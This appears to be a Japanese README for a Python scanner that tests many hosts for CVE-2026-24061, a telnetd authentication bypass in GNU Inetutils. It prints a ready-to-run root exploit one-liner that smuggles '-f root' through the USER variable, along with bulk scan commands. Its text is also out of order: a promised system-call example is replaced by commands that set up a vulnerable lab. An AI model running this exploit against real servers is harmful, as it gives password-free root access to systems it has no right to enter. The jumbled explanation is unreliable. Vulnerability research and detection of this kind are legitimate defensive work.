
Pythonベースのスキャナで、GNU Inetutils telnetdにおけるCVE-2026-24061を検出し、認証バイパス脆弱性について複数のターゲットを一括テストできます。
⚠️ 注意:
CVE-2026-24061GNU Inetutils は、GNU プロジェクトが提供する古典的なネットワークツール群であり、その中には Telnet サーバーデーモンであるtelnetdサービスが含まれています。バージョン 1.9.3 から 2.7 において、telnetdサービスのユーザー認証フローに致命的な欠陥が存在します。このサービスはシステムのログインプログラム/usr/bin/loginを呼び出す際に、クライアントから渡された USER 環境変数に対して効果的なフィルタリングと検証を行っていません。攻撃者は特定の USER 変数値を設定することで、-fパラメータを login コマンドに直接注入できます。login プログラムの-fパラメータは「二次認証のスキップ」に使用されるため、攻撃者はすべてのパスワード検証プロセスを完全にバイパスし、root ユーザーとして直接リモートセッションを確立し、サーバーの最高権限を取得できます。この脆弱性は極めて危険であり、公開された、資格情報を一切必要としないリモート root バックドアに相当します。
USER='-f root' telnet -a <target_ip>

python3 cve-2026-24061.py -i 10.10.168.128
python3 cve-2026-24061.py -f targets.txt
上記のコマンドは環境変数 USER を -f root に設定します。脆弱性が存在する telnetd サービスが接続を受信すると、以下のようなシステムコールを構築して実行します:
sudo apt update
sudo apt install openbsd-inetd inetutils-telnetd telnet -y
sudo sed -i 's/^#telnet/telnet/' /etc/inetd.conf
sudo systemctl restart openbsd-inetd
sudo ss -tuln | grep ':23'
telnet localhost 23